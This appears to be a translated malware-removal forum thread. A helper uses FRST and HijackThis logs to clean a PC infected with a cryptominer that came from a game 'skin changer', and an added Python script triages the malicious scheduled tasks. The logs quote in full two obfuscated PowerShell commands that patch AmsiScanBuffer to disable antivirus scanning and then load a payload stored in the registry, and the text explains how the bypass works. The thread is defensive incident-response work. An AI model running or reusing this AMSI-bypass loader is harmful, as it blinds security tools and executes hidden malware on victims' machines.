AlreadyBroken494
Wait until I have reviewed the report; there is no need to reset.
I am waiting, sir.
Wait until I have reviewed the report; there is no need to reset.
start::
emptytemp:
virustotal: C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atieclxx.exe;C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Windows\System32\amdfendrsr.exe;C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atiesrxx.exe;C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe;C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe;D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe;C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe;D:\Razer Gamebooster\Razer Cortex\RzKLService.exe;C:\Windows\system32\Device.dll;C:\Windows\system32\ISDone.dll;C:\Windows\system32\Platform.dll;C:\Windows\bsdsetupDH.dll;C:\Windows\SysWOW64\ADsSecurity.dll;C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
File: C:\Users\muhan\AppData\Local\Yandex;C:\Users\muhan\AppData\Roaming\SmartSteamEmu;C:\Users\muhan\AppData\LocalLow\Redbeet Interactive;C:\Users\muhan\AppData\Roaming\Windows;C:\Users\muhan\AppData\Local\7b85455024c255fb2d382134ede54108;C:\Users\muhan\AppData\Local\ADMITLoving;C:\Users\muhan\AppData\Local\Cloud Game;(FragSoft) C:\Windows\system32\ISDone.dll;C:\Users\muhan\.opera;C:\Users\muhan\Downloads\.opera
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
BootExecute:
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {52D709F9-9C14-424B-9077-5D714CEF9E0D} - System32\Tasks\TR_FastScan_AtLogon => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {709D0865-F852-409F-B5BC-139428474DF8} - System32\Tasks\TR_FastScan_Daily_Yılmaz => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters).
Task: {BFCC12A3-664B-42EB-8B9F-2A4BB1629A5C} - System32\Tasks\TR_AntiHijack => C:\Program Files (x86)\Trojan Remover\TRAntiHJ.exe (No File)
Task: {C9226DF5-08C3-486B-92A1-3039634E7EF5} - System32\Tasks\TR_Updater => C:\Program Files (x86)\Trojan Remover\Trupd.exe [6384408 2022-01-06] (Simply Super Software -> Simply Super Software)
Task: {D1333CC2-6205-4BAE-8ED2-B9A2A50A1599} - System32\Tasks\nslooksvc64 => powershell "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2220 more characters).
Tcpip\..\Interfaces\{05b349b0-aef9-4fed-b459-1625b65a9eda}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{ae71b50f-2054-491a-b219-1eb1f48c7549}: [DhcpNameServer] 192.168.42.129
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\kl_prefs_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.js [2022-03-06] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\kl_config_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.cfg [2022-03-06] <==== ATTENTION
CHR Extension: (Safe Torrent Scanner) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-16]
CHR Extension: (Fishing.io) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijifibpcinhcgbmclfilhcbcojmkdemh [2021-12-22]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-26] (McAfee, LLC -> McAfee, LLC)
2022-03-06 11:41 - 2022-03-06 11:41 - 000004146 _____ C:\Windows\system32\Tasks\TR_FastScan_Daily_Yılmaz
2022-03-06 11:41 - 2022-03-06 11:41 - 000004004 _____ C:\Windows\system32\Tasks\TR_FastScan_AtLogon
2022-03-06 11:41 - 2022-03-06 11:41 - 000003946 _____ C:\Windows\system32\Tasks\TR_Updater
2022-03-06 11:41 - 2022-03-06 11:41 - 000003786 _____ C:\Windows\system32\Tasks\TR_AntiHijack
2022-03-06 11:41 - 2022-03-06 11:41 - 000001371 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover FastScan.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover Updater.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001250 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Users\muhan\Documents\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\ProgramData\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\McAfee
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\AVG
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\Program Files\McAfee
2022-03-03 16:27 - 2022-03-05 14:52 - 000000000 ____D C:\ProgramData\Avast Software
AV: Kaspersky Anti-Virus (Disabled - Up to date) {4F76F112-43EB-40E8-11D8-F7BD1853EA23}
FW: Kaspersky Security Cloud (Disabled) {774D7037-0984-41B0-3A87-5E88E680AD58}
Kaspersky Anti-Virus (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden
Links version 1.0 (HKU\S-1-5-21-1593825937-2386105780-1848293327-1005\...\Links_is1) (Version: 1.0 - Links) <==== ATTENTION
ContextMenuHandlers1: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers2: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers6: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
FirewallRules: [{9512C89E-6BE2-4C79-8A83-66AE2CB09ACC}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{559034AF-7527-45AB-A0AB-59178D3B1518}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{B7E90CAA-1493-4949-86A0-F0D04A4CC2A7}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{9FE56EC5-53B8-4560-9040-28D919EDDAAF}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{51654940-0E91-496C-94F9-388259243044}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{2A048AE4-BDFE-4E81-894F-AD0EB00E8DBA}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
end::
In order:
From Control Panel, uninstall Kaspersky, McAfee, Trojan Remover, Links and every other application you do not recognise.
Run the tools below one after another and clean up the leftovers.
After copying the code, press the Fix button in Farbar. Share the file named Fixlog.txt here.
No. Remove the extensions named Fishing.io and Safe Torrent Scanner from Chrome. After that, share the report below.
HijackThis Log Sharing and Solutions (www.technopat.net)
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
Fix these.
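An added triage script for the two nslooksvc32 / nslooksvc64 tasks that appear in both the FRST report and the HijackThis log above. It is my own example, not code from the thread, from FRST or from HijackThis. It folds the split string literals ('Ams'+'iSc'+'an'+'Buffer') back together, flags the API names that make up an in-memory AMSI patch, decodes the bytes the task writes over AmsiScanBuffer, and pulls out the registry value the final [Reflection.Assembly]::Load reads. The sample log embedded below is a constructed, abbreviated copy of lines from this thread; the function names, the indicator list and the output layout are my own choices.

```python
"""Added triage helper (not part of the thread): scan FRST "Task:" and
HijackThis "O22 - Task:" lines for PowerShell actions that patch AMSI in
memory, and decode the stub they write over AmsiScanBuffer."""
import re
import struct

# Constructed sample: abbreviated copies of task lines from the logs in this
# thread. The FRST line is cut exactly where FRST cuts it; the HijackThis lines
# keep only the fragments this script looks at ("..." marks omitted text).
SAMPLE_LOG = r'''
Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{...$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters).
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "...GetMethod('Ge'+'tPr'+'ocAdd'+'ress',...);...[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');...[Object]('Ams'+'iSc'+'an'+'Buffer')));...[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);...[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "...GetMethod('Ge'+'tPr'+'ocAdd'+'ress',...);...[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');...[Object]('Ams'+'iSc'+'an'+'Buffer')));...[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);...[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
'''

# One regex for both log formats: FRST "Task: {GUID} - System32\Tasks\NAME => CMD"
# and HijackThis "O22 - Task: [(tag)] NAME - CMD".
TASK_RE = re.compile(
    r'^(?:Task: \{[0-9A-Fa-f-]+\} - System32\\Tasks\\(?P<frst>.+?) => '
    r'|O22 - Task: (?:\([^)]*\) )?(?P<hjt>.+?) - )(?P<cmd>.*)$')
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
BYTES_RE = re.compile(r'\[Byte\[\]\]\(([^)]*)\)')
STAGER_RE = re.compile(r"LocalMachine\.OpenSubkey\('([^']*)'\)\.GetValue\('([^']*)'\)")

# Names that, together, spell out "resolve AmsiScanBuffer, make it writable,
# overwrite it, then load a .NET assembly from the registry". Hypothetical list.
INDICATORS = (
    'AmsiScanBuffer', 'VirtualProtect', 'GetProcAddress',
    'GetDelegateForFunctionPointer', 'DefineDynamicAssembly',
    'Reflection.Assembly]::Load', 'Registry]::LocalMachine',
)


def deobfuscate(cmd):
    """Fold 'Ams'+'iSc'+'an'+'Buffer' style string splitting back into one literal."""
    while True:
        folded = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
        if folded == cmd:
            return cmd
        cmd = folded


def extract_patch_bytes(plain):
    """Return the byte array passed to Marshal::Copy, or None if there is none."""
    m = BYTES_RE.search(plain)
    if not m:
        return None
    return bytes(int(tok.strip(), 0) for tok in m.group(1).split(','))


def decode_patch_stub(code):
    """Decode a 'mov eax, imm32 ; ret [n]' stub; returns None for anything else."""
    if len(code) < 6 or code[0] != 0xB8:          # B8 imm32 = mov eax, imm32
        return None
    hresult = struct.unpack_from('<I', code, 1)[0]
    tail = code[5:]
    if tail[0] == 0xC3:                           # C3 = ret (x64: caller cleans stack)
        ret, arch = 'ret', 'x64'
    elif tail[0] == 0xC2 and len(tail) >= 3:      # C2 imm16 = ret n (x86 stdcall)
        n = struct.unpack_from('<H', tail, 1)[0]
        ret, arch = 'ret 0x%x' % n, 'x86 stdcall (callee pops %d bytes = %d args)' % (n, n // 4)
    else:
        return None
    return {'hresult': hresult, 'ret': ret, 'arch': arch}


def triage(log_text):
    """Return one finding per task line whose command carries AMSI-patch indicators."""
    findings = []
    for raw in log_text.splitlines():
        m = TASK_RE.match(raw.strip())
        if not m:
            continue
        plain = deobfuscate(m.group('cmd'))
        hits = [name for name in INDICATORS if name.lower() in plain.lower()]
        if not hits:
            continue
        stub = extract_patch_bytes(plain)
        stager = STAGER_RE.search(plain)
        findings.append({
            'task': m.group('frst') or m.group('hjt'),
            'source': 'FRST' if m.group('frst') else 'HijackThis',
            'indicators': hits,
            'patch': decode_patch_stub(stub) if stub else None,
            'stager': 'HKLM\\%s\\%s' % stager.groups() if stager else None,
            # FRST cuts long task actions, so the payload may be invisible there.
            'truncated': 'more characters' in plain,
        })
    return findings


if __name__ == '__main__':
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The two tasks differ only in the stub: b8 57 00 07 80 c2 18 00 is mov eax,0x80070057 ; ret 0x18 for 32-bit PowerShell (stdcall, the six 4-byte arguments of AmsiScanBuffer are popped by the callee), and b8 57 00 07 80 c3 is the same with a plain ret for 64-bit. 0x80070057 is E_INVALIDARG, so every scan request fails, PowerShell never receives a detection result, and the script that follows runs unscanned. Two practical points follow from the command line itself: the FRST fix above deletes the task entries, but the actual payload is the assembly stored in the registry value HKLM\SOFTWARE\nslookstager, which should be checked (and exported for analysis) as well; and FRST truncates long task actions, which is why the HijackThis output was needed before the payload could be seen at all.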
The active malware should now be gone. You can test this by reinstalling Kaspersky. I also recommend running a full system scan with the tool below.
Emsisoft Emergency Kit: Free Portable Malware Scan and Removal (www.emsisoft.com)
Hello everyone. Yesterday my brother installed a silly program called Valorant skin changer; he is 9 years old and did it without my knowledge. A mining virus infected the computer. I was able to delete part of it, but Kaspersky could not delete one virus named "MEM:Trojan.Win32.SEPEH.gen" (location: System memory). I tried running in safe mode and deleting it, which did not work; I clicked "open file location" and nothing opened; when I try to remove it, the screen goes black.
Applications I have tried:
Kaspersky Anti-Virus
360 Total Security
Trojan Remover
Besides these I was going to try Malwarebytes, but at the end of the installation it stops responding and closes. (Someone on the internet wrote that they solved an overheating problem with it.)
Also, since this virus appeared, Windows+S does not work, Task Manager gave an error at startup, and the SSD has become terribly slow.
I also cannot update my graphics card driver (error 1603).